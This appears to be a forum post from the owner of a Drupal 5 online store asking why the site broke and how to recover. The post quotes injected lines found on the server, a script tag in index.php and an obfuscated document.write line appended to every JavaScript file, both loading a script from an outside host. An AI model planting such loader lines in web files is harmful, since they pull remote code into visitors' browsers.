This is about an online store based on Drupal 5.

All of a sudden it didn't work anymore. Upon accessing the site, this error came up:

Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38

Upon further inspection I found the following two lines at the end of said index.php:

<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->

After manually removing those 2 lines, the site seems to work fine again.

But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end:

document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');

Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself?

Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?